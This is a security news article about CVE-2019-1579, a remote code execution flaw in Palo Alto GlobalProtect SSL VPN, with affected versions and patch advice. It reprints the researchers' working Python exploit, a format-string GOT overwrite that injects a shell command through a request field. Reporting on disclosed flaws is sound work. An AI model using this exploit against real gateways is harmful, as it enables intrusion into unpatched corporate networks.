News Security

IS researchers published a PoC code for critical vulnerabilities in Palo Alto Networks firewalls

Palo Alto Networks vulnerability
Written by Brendan Smith

Company Palo Alto Networks quietly fixed the critical vulnerability in its corporate SSL GlobalProtect SSL VPN solution implemented in Palo Alto firewalls.

Exploiting the vulnerability allowed attackers remotely execute an arbitrary code. Vulnerability (CVE-2019-1579) affecting the GlobalProtect solution and the GlobalProtect Gateway interface can be exploited by an unauthorized attacker by sending a specially crafted request to the device.

Security researchers Orange Tsai and Meh Chang discovered the bug.

“We surveyed all Palo Alto SSL VPN over the world to see if there is any large corporations using the vulnerable GlobalProtect, and Uber is one of them!”, — said researchers.

Uber took a very quick response and right step to fix the vulnerability.

Affect versions:

According to our survey, all the GlobalProtect before July 2018 are vulnerable! Here is the affect version list:

  • Palo Alto GlobalProtect SSL VPN 7.1.x < 7.1.19
  • Palo Alto GlobalProtect SSL VPN 8.0.x < 8.0.12
  • Palo Alto GlobalProtect SSL VPN 8.1.x < 8.1.3

PoC-code:

Experts published the PoC-code to demonstrate the process of exploiting the vulnerability.

#!/usr/bin/python

import requests
from pwn import *

url = "https://sslvpn/sslmgr"
cmd = "echo pwned > /var/appweb/sslvpndocs/hacked.txt"

strlen_GOT = 0x667788 # change me
system_plt = 0x445566 # change me

fmt =  '%70$n'
fmt += '%' + str((system_plt>>16)&0xff) + 'c'
fmt += '%32$hn'
fmt += '%' + str((system_plt&0xffff)-((system_plt>>16)&0xff)) + 'c'
fmt += '%24$hn'
for i in range(40,60):
    fmt += '%'+str(i)+'$p'

data = "scep-profile-name="
data += p32(strlen_GOT)[:-1]
data += "&appauthcookie="
data += p32(strlen_GOT+2)[:-1]
data += "&host-id="
data += p32(strlen_GOT+4)[:-1]
data += "&user-email="
data += fmt
data += "&appauthcookie="
data += cmd
r = requests.post(url, data=data)

Read also: Drupal fixed a critical vulnerability that could be used to hijack sites

How to fix?

When researchers reported about this bug in Palo Alto Networks, however, they got the following reply:

“Thanks for the submission. Palo Alto Networks does follow coordinated vulnerability disclosure for security vulnerabilities that are reported to us by external researchers. We do not CVE items found internally and fixed. This issue was previously fixed, but if you find something in a current version, please let us know”, — commented in Palo Alto Networks.

So, it seems, this vulnerability is known for Palo Alto, but not ready for the world.

Administrators are urged to upgrade to PAN-OS versions 7.1.19 and higher, 8.0.12 and higher, 8.1.3 and later.

Sending
User Review
0 (0 votes)
Comments Rating 0 (0 reviews)

About the author

Brendan Smith

Journalist, researcher, web content developer, grant proposal editor. Efficient and proficient on multiple platforms and in diverse media. Computer technology and security are my specialties.

Leave a Reply

Sending

This site uses Akismet to reduce spam. Learn how your comment data is processed.